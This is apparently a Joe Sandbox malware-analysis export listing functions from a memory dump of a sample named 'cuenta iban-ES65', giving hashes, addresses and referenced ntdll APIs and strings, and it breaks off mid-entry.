Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 3fd09b10ac32c64a34294a7ff00631f73176504ad1030a3a63d4b74aefe1f6af
Instruction ID: b9e08913e30aef0953ab7cbf815f39b4dfc8555a0adf5e3cf0f33072fb2598d3
Opcode Fuzzy Hash: 3fd09b10ac32c64a34294a7ff00631f73176504ad1030a3a63d4b74aefe1f6af
Instruction Fuzzy Hash: DC01ADB2350740AFD311CF24CD49B2277F8EB40B1AF018979E958DB9A5E738E904CB46

Uniqueness

Uniqueness Score: -1.00%

Function 3773C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 3773C7E3, 3773C960

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 480c3df48f080effde6cad200ffa26f527e6b0828d87d820a3ff2f57b981c600
Instruction ID: 10710bcfce689dd1effb2a90a3c14de767ff10df7ed34087c1c67d995ae390de
Opcode Fuzzy Hash: 480c3df48f080effde6cad200ffa26f527e6b0828d87d820a3ff2f57b981c600
Instruction Fuzzy Hash: 34824E79E023188FFB14CFA9C8807ADB7B6BF44750F108569D859AF292DB34AD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 377D9C98 Relevance: 2.1, APIs: 1, Instructions: 591timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 377D9CBA

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: a01986239f123897dbffbd020095c778c9bf7ac85ecd44c07ac36e3cc59db4c5
Instruction ID: 90e919c6528e851d2720a0d305e0c4d4c30298b75a10f528b728bdffbbb24935
Opcode Fuzzy Hash: a01986239f123897dbffbd020095c778c9bf7ac85ecd44c07ac36e3cc59db4c5
Instruction Fuzzy Hash: D522BE786087518BE714CF29C0907B2B7F2FF45354F55889AE8868F286EB75E852CB60

Uniqueness

Uniqueness Score: -1.00%

Function 377364F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4764ce6e912d7ae98a95d52113b43cd07290fb36bb9e3a5e718fa52dc4a5fe28
Instruction ID: 379d13d519b1a5ae5956a8b653ba7943f9e616bbff2da3257727312fc9f1066f
Opcode Fuzzy Hash: 4764ce6e912d7ae98a95d52113b43cd07290fb36bb9e3a5e718fa52dc4a5fe28
Instruction Fuzzy Hash: EAE16A7560A341CFE354CF28C090B5ABBF2BF89358F54896DE4958B352DB31E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 3774CF00 Relevance: 1.8, APIs: 1, Instructions: 345timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3774D2C4

Part of subcall function 377B8514: RtlDebugPrintTimes.NTDLL ref: 377B8579

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: ce68cab8f40eba70229a1af36aebe508f11c76b45865eca96344a67e01d61ae1
Instruction ID: 89f91176cb35aa3c6e1229e239e8bcd1f7e3841f6a6c2201978b4f9c02cdbb39
Opcode Fuzzy Hash: ce68cab8f40eba70229a1af36aebe508f11c76b45865eca96344a67e01d61ae1
Instruction Fuzzy Hash: 27D1A475B00315CFEB11CF24C894BA9B7B2AB49314F4244D9DA89BF251DB38AD85CF52

Uniqueness

Uniqueness Score: -1.00%

Function 3775E507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbea33dba795acc6fd2d3ff5062322d94ef3217b3746296d7f488d92e7a94b37
Instruction ID: 2d00df2b2aee1afd223d271b5311b0459d25afa75b08acf5408f0478c0557b4f
Opcode Fuzzy Hash: bbea33dba795acc6fd2d3ff5062322d94ef3217b3746296d7f488d92e7a94b37
Instruction Fuzzy Hash: 19A1F671E01314EFEB11CBA4D848BED7BA5EF06778F010665E910BF290DBB8A945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 37752DB0 Relevance: 1.7, Strings: 1, Instructions: 438COMMON

Download Yara Rule

Strings

0, xrefs: 37753160

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 5e89496cbe2b5310cb0232f0ad1eca9d6461d39e1bb35670d6b6ced78e7de899
Instruction ID: 5513af986fc95e0fee1a5791684ca937de2a149158b5e1182032450225a4f253
Opcode Fuzzy Hash: 5e89496cbe2b5310cb0232f0ad1eca9d6461d39e1bb35670d6b6ced78e7de899
Instruction Fuzzy Hash: F3F19AB5609742CFE711CF24D484B6ABBE2AF88774F054C6DE8899F290DB34E905CB52

Uniqueness

Uniqueness Score: -1.00%

Function 37737623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4c5f810db001fbb8d9fa8947ad6fe94b6ec32eb64a65016ba076e5b08a208ff
Instruction ID: 1eb0d49c20c203768c1399da8a96989fd8172e1e4d61e9800ac02fefd5ca00e4
Opcode Fuzzy Hash: b4c5f810db001fbb8d9fa8947ad6fe94b6ec32eb64a65016ba076e5b08a208ff
Instruction Fuzzy Hash: 12613375A01606EFEB08CF68C480B9DFBB6BF49354F14856ED419AB341DB34A9518FD0

Uniqueness

Uniqueness Score: -1.00%

Function 37732EE8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

PATH, xrefs: 37732FF6, 37733044

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 34e00c793a36b338ab166746a3cda0bee171284d0369fbe9e1946e392523d843
Instruction ID: fe7c0461fb68e40b3b603802fa584ac4e98fa4f388230fdd73f6afff483e05bf
Opcode Fuzzy Hash: 34e00c793a36b338ab166746a3cda0bee171284d0369fbe9e1946e392523d843
Instruction Fuzzy Hash: DAF1A275E01218DFEB24CF98C881BBEBBB1FF48750F598429E404AF251DB39A941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 3773254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 37732630

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 6aec6c05491abcc598b002583ff2049de87329901a884d339f5a907cc99a93d8
Instruction ID: 8a6b974965dceb6cb4d05a787df8d82c898d9392c0512a7fed00aefdf84d8402
Opcode Fuzzy Hash: 6aec6c05491abcc598b002583ff2049de87329901a884d339f5a907cc99a93d8
Instruction Fuzzy Hash: D041A2B5602704DFE711DF24C954B59B7F2FF44364F10899AC0169FA92DB34AA81CF82

Uniqueness

Uniqueness Score: -1.00%

Function 37734779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 37734817

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: f5f090f413fa7c1b2c88c8ea0134dbc143b31842c15b258ea07804f22ab4ff9f
Instruction ID: 2a360002f92ad6152d8435bf4ee7a1ac2ebcac78a235b1e02a301c9edde4ed41
Opcode Fuzzy Hash: f5f090f413fa7c1b2c88c8ea0134dbc143b31842c15b258ea07804f22ab4ff9f
Instruction Fuzzy Hash: 8E41A0746013418BE319CF28D894B7ABBE6FF85761F50483DE5458F2A2DB34E845CA91

Uniqueness

Uniqueness Score: -1.00%

Function 3772B420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3772B4AC

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 651d7b2ab648f9953bcf5c90ed03977572f5245765f52bcdd15cb0f2ec9b3405
Instruction ID: a73fdf327d45d7529c2caada5a41cea19ef1b48610f158430b7ae09966245e27
Opcode Fuzzy Hash: 651d7b2ab648f9953bcf5c90ed03977572f5245765f52bcdd15cb0f2ec9b3405
Instruction Fuzzy Hash: 02312172640204AFC311CF14C888A6A7BA6FF45760F508669ED649F2A1EB31ED42CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 377356E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 37735762

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 659c087224d46a90a8447e3236b4dd2b0f22024e851b92066d66f8feafcb7c92
Instruction ID: 004c8138392f488e1b77c03eb31c4ea96dc96e08440a99cdb8130d782f98aeff
Opcode Fuzzy Hash: 659c087224d46a90a8447e3236b4dd2b0f22024e851b92066d66f8feafcb7c92
Instruction Fuzzy Hash: F731A035712A06FFE7568B24DE80B99BBA6FF89394F405065E8008BA51CB35E931CFC1

Uniqueness

Uniqueness Score: -1.00%

Function 377DE750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 377DE7B1

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 68f731a28a4c62117955b73a892f388d194631456c79ece9a592045f5318486f
Instruction ID: c9e130ac2a0b6d9e012913ed49d357b8c1594730258bb455dcc046484eec4ef0
Opcode Fuzzy Hash: 68f731a28a4c62117955b73a892f388d194631456c79ece9a592045f5318486f
Instruction Fuzzy Hash: 683187B5518341DFC701DF19C444A4ABBE2FF8A664F449AAEE4889F201D371ED45CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 37733536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 377335C1

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: f5f58925f799a55651ea45810f5fff3a7532833aa57c4869a2f9b52e51a1b1f6
Instruction ID: 5018dc8e5dc9ba48db9e25fb78d3f5f95fd64b66989a18966dc078bc866b3586
Opcode Fuzzy Hash: f5f58925f799a55651ea45810f5fff3a7532833aa57c4869a2f9b52e51a1b1f6
Instruction Fuzzy Hash: 9121F5352066009FE7319F14C944B1ABBA2FF89B25F450969E8454F742C774EC88CBD3

Uniqueness

Uniqueness Score: -1.00%

Function 377300A0 Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

, xrefs: 377301F5

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: be51f15b8f212c763ab257fdea202b38474967210b3921a160f03e7cba2ea0e3
Instruction ID: 963ffdc0f4b067a803f2689390ff46a66b047d01e571c43ca4d1d3f3d952e08d
Opcode Fuzzy Hash: be51f15b8f212c763ab257fdea202b38474967210b3921a160f03e7cba2ea0e3
Instruction Fuzzy Hash: FDA14775A1535C7AFB14CA24CC45BFE67A79F04364F0408A9EDC5AF182DBB89940CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 377BA130 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 377BA19A

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: d26f09b58c1c3fc9b09725e07191d68b238be7df45dafa73918c9b8c6d273db1
Instruction ID: 1eba2e807f54c469cb6f1b350a0c8592f6a6618eaf58530b701d3a1021cc4756
Opcode Fuzzy Hash: d26f09b58c1c3fc9b09725e07191d68b238be7df45dafa73918c9b8c6d273db1
Instruction Fuzzy Hash: EE01493615125DABDF129E84C841EDA3F66FB4C764F068511FE286A220C636D971EB81

Uniqueness

Uniqueness Score: -1.00%

Function 377292AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 377292D5

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 66b1080c1694c65c04083595757f33093777729a8c08dbc38212a87b40718008
Instruction ID: 4cf0e09b266b7f11c358ce6a3881b2eb965d00c4c441e866421338fd9a9d3a59
Opcode Fuzzy Hash: 66b1080c1694c65c04083595757f33093777729a8c08dbc38212a87b40718008
Instruction Fuzzy Hash: 1CF0FA32204600AFD331CB09CC08F8ABBEEEF84B10F08052DE946A7091D7A4F90ACA60

Uniqueness

Uniqueness Score: -1.00%

Function 3776A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 377A65D4

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: f00bef96b1bc5de4e994ca53267d28c65b8bd5d19d7413226fe6bce654b73b86
Instruction ID: b746824291c69ef7427b4cad971725d8e1d71e1e4d94365494e872812c4b8c64
Opcode Fuzzy Hash: f00bef96b1bc5de4e994ca53267d28c65b8bd5d19d7413226fe6bce654b73b86
Instruction Fuzzy Hash: F3714EB5E003199FEF64CF98C59079DBBB2BF48764F14862AE805EB344EB359941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 3773965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

@, xrefs: 37739713

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
Instruction ID: 700bfeb4c447a4c2a08395a448913e26ef72598bee8b5a2f98cbf887fd6d50d9
Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
Instruction Fuzzy Hash: 5E617B75D02219ABEF11DF98D844BEEBBB5EF45769F100529E810BB290DB749A01CF90

Uniqueness

Uniqueness Score: -1.00%

Function 377402F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#%u, xrefs: 37794B8F

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: #%u
API String ID: 0-232158463
Opcode ID: 4afa268ec2d58df9e2bb18f5b7825dad5d130169d6018a3fa78d711d9d96d58e
Instruction ID: e2353c53169136bbbe7544a43fbb0d59280ea7b4733fe5ae6b775a8d5ac6af99
Opcode Fuzzy Hash: 4afa268ec2d58df9e2bb18f5b7825dad5d130169d6018a3fa78d711d9d96d58e
Instruction Fuzzy Hash: 47715B71A00249DFDB01CFA8D994FAEBBF9EF09744F144469E904EB251EB38E901CB61

Uniqueness

Uniqueness Score: -1.00%

Function 377BF42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 377BF4E7

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
Instruction ID: 011d8f47fa8dcaf6d86611ef1f6780b66906c7e496995cb61295657d6e44d600
Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
Instruction Fuzzy Hash: 6F51BD72604745AFEB218F64C884F6AB7E8FF44B64F400929F9449B290DB74EA15CB92

Uniqueness

Uniqueness Score: -1.00%

Function 3774E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 3774E5C4

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 63fb7308bcfa75eeeb7a3a32381e7f7861421f0cdd95c26e406f30f4636ed82e
Instruction ID: 4249073365cf0de0c6573d71e2736744fadb27b3882b8874ce49b2dfba9c9518
Opcode Fuzzy Hash: 63fb7308bcfa75eeeb7a3a32381e7f7861421f0cdd95c26e406f30f4636ed82e
Instruction Fuzzy Hash: 11416E71529311ABD710CA65D844B6FB7E8AF89768F400E2DF584AF180EBB8D9048793

Uniqueness

Uniqueness Score: -1.00%

Function 377AC3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 377AC3FF

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 37ec9311d1cf116f12976a7e448aa9bca244be33183f273375def71f2be1b027
Instruction ID: addc56e1994bf9d79301b903d2a85a904eae79951ad715dd53e2f29f2a0c3b1d
Opcode Fuzzy Hash: 37ec9311d1cf116f12976a7e448aa9bca244be33183f273375def71f2be1b027
Instruction Fuzzy Hash: 064144B190012CAAEF61DA54CC85FEE777DAF44714F0045E5E608AF240DB349E888FA5

Uniqueness

Uniqueness Score: -1.00%

Function 377307A7 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

r7, xrefs: 377307A9

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: r7
API String ID: 0-835287407
Opcode ID: 6172599e07359c5dde53d09c7ad4bd057065763e91a6e0adbf675a83f0191c45
Instruction ID: a3030f23c16f1774de1aae1e717b50c5c4986c1487818683aa76ccfc144e7c7f
Opcode Fuzzy Hash: 6172599e07359c5dde53d09c7ad4bd057065763e91a6e0adbf675a83f0191c45
Instruction Fuzzy Hash: 1F418E716027059FE724CF68C880A62B7FAFF48314B50897DD4968EA52EB34F855CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 377B9429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 377B94F0

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 767d938e9d0eb2ffe78b6b3bc9fd6a725a97c9ae28f557fce2e802ef5e9cf890
Instruction ID: a3921b1ab3a99fab574846f8d26261df7a8ad7a9ae831f3852e77a7895251e87
Opcode Fuzzy Hash: 767d938e9d0eb2ffe78b6b3bc9fd6a725a97c9ae28f557fce2e802ef5e9cf890
Instruction Fuzzy Hash: 4731C5B5780201EFEF248F68D891B3677E6EF49760F90846AE518DF3C1EA359D818B50

Uniqueness

Uniqueness Score: -1.00%

Function 37767425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 377A442D

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
